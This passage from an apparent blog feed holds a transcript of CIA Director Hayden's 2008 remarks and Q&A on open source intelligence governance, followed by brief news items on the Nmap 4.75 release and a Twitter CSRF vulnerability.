Remember the comment I mentioned where Hayden and Kappes went out there and visited 50 liaison partners?  In several of those instances, the takeaway, the thing we brought home, was a new relationship between their open source enterprise and our open source enterprise as well.  We're taking advantage of expertise across the spectrum from NGA headquarters in Bethesda to the Foreign Military Studies office at Fort Leavenworth, Kansas, to the Asian studies detachment at Camp Zama, Japan.

Open Source Center is expanding its training from officers across the community.  Half of the Open Source Academy students this year work for organizations other than the Central Intelligence Agency.  Perhaps most importantly, the center is making more intelligence-related content available to more people in government than ever before.

Fifteen thousand people, state and local, Congress, policy-makers regularly use opensource.gov.  Now, we want to build on that momentum, and that's what drove the action plan that I know Doug's already talked to you about.  It's strategic in nature, but he and I have talked.  This isn't about moon-shots or dreams; it's about practical, near-term, incremental objectives.  I think we've set the path and now it's simply time to execute.

Now, one of the things we're going to do to help Doug execute is to change governance a bit for the open source enterprise, not the center, but the open source enterprise.  So today I'd like to tell you a bit about the creation of a new community-wide governance board that will guide us as we move forward.  The Open Source Board of Governors will consist primarily of open source producers and stakeholders throughout the Intelligence Community.  And what we want to be able to do is to lead an integrated approach to exploiting openly available information.  The board of governors will set strategies and priorities for the open source enterprise based on the input from all who want to ensure its success.

We see this board of governors as a forum where consensus can be reached on how best to use our collective resources today and in the future.  It will consider things like IT strategy and IT policy.  How do we wire up together?  The centralization of services, services of common concern like training or content-acquisition, things like standardization, standardization of tradecraft.  The idea is to set direction and priorities in a way that allow each of the players, each of the elements of the open source enterprise to develop and make the most of their capabilities.

We've had this for the past year for one of the other functions at CIA.  In addition to being the executive agent for the Open Source Center, I am the national HUMINT manager.  In that hat, we have a national HUMINT board of governors in which anyone who's collecting information from our species has a seat at the table.  And we have been able, through consensus, to develop a set of priorities and standards that we will be able to use across the board in human intelligence collection and reporting.

Well, why can't we do that in open source as well?  The open source board will meet quarterly.  The first session will take place before the end of the year and at that meeting, we'll set a work plan for the coming calendar year with key milestones and decision points.

Now, yesterday, as I know all of you know, we marked a solemn anniversary, seven years since the attack on our homeland.  That one terrible day prompted action across our community on many levels.  And I think the IC, the Intelligence Community, can be proud of the work that it's done in the last seven years.  Together with partners across our country and across the world, we have kept the United States safe.

But we owe it to our people, the American people, never to be fully satisfied with the job we're doing.  We owe it to them to constantly ask the question, how can we better do this?  How can we better achieve our mission?  There is abundant evidence that we're asking that question and challenging ourselves now more than ever in the open source arena.

So I'm delighted to be here today.  I'm even more delighted to see you here today representing the organizations of which you are a part, but maybe more fundamentally representing the enthusiasm that is now out there for this incredibly important discipline.

Thank you then for your energy and your dedication.  It inspires us as we continue to serve our fellow citizens to the best of our ability.  And with that, I'd be happy to take any comments or questions you might have in the time remaining to us.  Thank you.

(Applause.)

MS. SABRA HORNE (ODNI Senior Advisor for Open Source/Outreach):  Thank you so much, General Hayden.  We have four questions for you that we've taken from the audience.  I'll start with the first one.  "This conference sponsored an open source analytic contest, an unclassified mini National Intelligence Estimate, if you will.  Why doesn't the IC publish unclassified NIEs that could be subject to the peer review of the open source community?"

DIRECTOR HAYDEN:  Okay, what do the other three look like?  (Laughter.)  I don't know if all of you know this, but even the classified NIEs are subject to peer review.  There are outside readers for even the most highly classified National Intelligence Estimates.  So that's very important.  So in terms of the discipline, even at the highest levels of classification, we do get outsiders to come in and give us a view.  So I think that's very important.

I guess the second observation I'd make is that the NIEs are kind of the capstone documents.  In fact, in some cases, they're criticize them, looking at Mark here, too capstone, too ethereal.  But when they hit the sweet spot, when they bring in all of the threads of information in a digestible body for a policy-maker to actually think and decide on something that's quite important.  So I guess what I'd underscore to you there – it's all source.  It brings them all in so that the policy-maker can have all of the data that we have available to him in one place.

Now, that is not to undersell the independent analysis that's done in the unclassified world in which we, frankly, shamelessly, try to leverage and exploit in our own classified work.

MS. HORNE:  "With respect to the phrase 'Open source is good,' do you believe open source is a double-edged sword?  We need to always understand how adversaries can use our open source information against us.  And what is being done about this problem?"

DIRECTOR HAYDEN:  Yeah.  Every intelligence discipline has the challenge you just described.  Vince Fragamini (sp) was my deputy when I became a brigadier and I was the EUCOM J-2.  And Vince was a career Navy Intelligence Officer.  He had run their intel school down at Dam Neck before he came out to Stuttgart to be the J-2.  Vince had a great phrase: live by SIGINT, die by SIGINT.  (Laughter.)  And it wasn't designed to be critical of SIGINT, it's just that SIGINT has the tendency to be out there on your breaking-edge news so you get the SIGINT report and Vince had another phrase: when in doubt, put it out, okay?  (Laughter.)  But then he would always remind me: live by SIGINT, die by SIGINT.

And I guess what I'm trying to describe for you is the problem of deception is present in every intelligence discipline, whether you're listening to someone, whether you're observing someone or something, or whether you're meeting with someone personally.  And it doesn't have to be deception in terms of being intentional.  This guy may be giving his impression of a meeting.  How many of you had that guy talk to you, okay?  The guy gave you an impression of the meeting which is at total variance with everyone else who was in the room?

Well, when we intercept that conversation, that becomes intelligence and we report on it in the same way in which we would be looking at that individual's remarks were he giving them at a press conference following the aforementioned meeting.  So this problem of sorting through is present in all of our disciplines so I think what I'd suggest to you is, open source, just like every other stream of intelligence available to us, has to be vetted and has to be bumped up one against the other in order to find out the best version of truth.

MS. HORNE:  "We've spoken of the importance and key role of open source.  Within the CIA, the unclassified resources, infrastructure, and support has lagged behind the classified.  How will the CIA put the unclassified and open source infrastructure on equal footing?"

DIRECTOR HAYDEN:  It's challenge, you know, truth in lending among friends, these are not easy budget decisions, but we have made the commitment to strengthen this discipline.  And I should add, too, this discipline's budget is set off for special scrutiny, set off from the rest of CIA's budget so that it is visible and observed not just by me, but by people north of me in the organization chart.

Now, we recognize that this does require investment.  Somewhat like the SIGINT enterprise, which I was familiar with in my time at NSA, you really need an awful lot of computational power and IT and storage to handle the kinds of volume we now get in American SIGINT and which Doug now has to deal with in American open source reporting.  So it requires investment.  We're committed to that, but it's a balancing act; a little more over here means a little less over there.  We just have to do the best we can.

I should add, too, we do recognize we're digging out of a deficit here.  This is probably one discipline in which we have underinvested and we have to play some catch-up.

MS. HORNE:  And, finally, "How do we encourage more experiences like your Bulgarian open source experience?"

DIRECTOR HAYDEN:  One of the things we're doing – and we're very serious about this – we're trying to shove our analysts out the door, off of Langley, and push them forward.  So a significant fraction of our analytic workforce now does its work – I mean, it does what it would be doing at CIA Headquarters, but it's not doing it at CIA Headquarters; it's doing it at forward locations.

Now, a lot of those would be in Iraq or Afghanistan in direct support of what's going on there.  But there's also an awful lot who are not there, that are in other locations and the idea there is, well, to step back and put this into a second context.  Half of our analysts have been hired in the last six years.  So I go to Michael Morell or John Kringen and before him and say, we need more experience in our analytic workforce.

And I'm accustomed, as a former GI, you know, I know how long it takes America's Army to build a battalion commander; it takes 18 to 19 years, then someone is a lieutenant colonel and he's ready to command a battalion.  So I go to Michael or to John and say, how long would it take to build us an analyst with 20 years experience?  (Laughter.)

And the answer they come back with is frankly unacceptable.  (Laughter.)  We have found, pushing analysts forward into the area in which they report, the things they think about, accelerates this experiential curve.  And why does it accelerate the experiential curve?  Because the first newspaper they read in the morning is a local newspaper in the local language; the last thing they look at, at night before they go to bed is the local news in the local language.  They know whether things are comfortable or uncomfortable, the population is tight or relaxed because they're on the metro with them, I mean, all of those things that an attaché can absorb, we're trying to do that for our analysts as well.

So I think, in its own way, perhaps indirectly, it's doing that kind of acculturation that I underwent when I was serving in Sofia back in the 1980s.

Thanks very much.

MS. HORNE:  Thank you, General Hayden, for your comments.  And we especially appreciate your appreciation and advocacy for open source.

Thank you.

Nmap 4.75 Released [Infosecurity.US]

Posted: 12 Sep 2008 03:54 PM CDT

Insecure.org has announced the release Nmap 4.75, with nearly 100 significant enhancements from version 4.68. Certainly, one compelling reason to upgrade from a previous version is the applications ability to graphically map network topologies.

Dubbed the Zenmap Network Topology, the graphical mapping utility generates an interactive, animated map of the hosts on a network and inter-connects.

Another Twitter Vulnerability [Infosecurity.US]

Posted: 12 Sep 2008 03:23 PM CDT

DARKNET posts in a follow-on (no pun intended) report, of yet another Twitter vulnerability; this time a CSRF (Cross Site Response Forgery) vulnerability which apparently permits forced following.

From the post:

“Last week, TechCrunch's Jason Kincaid wrote about an obvious Twitter vulnerability that allowed a user called "johng77536? to game the popular micro-blogging service to add thousands of followers (subscribers) in a short period of time.

The "johng77536? account has since been disabled but a security researcher tracking Twitter security flaws and weaknesses has discovered a new vulnerability that lets users easily game the "follow" system.”

No comments: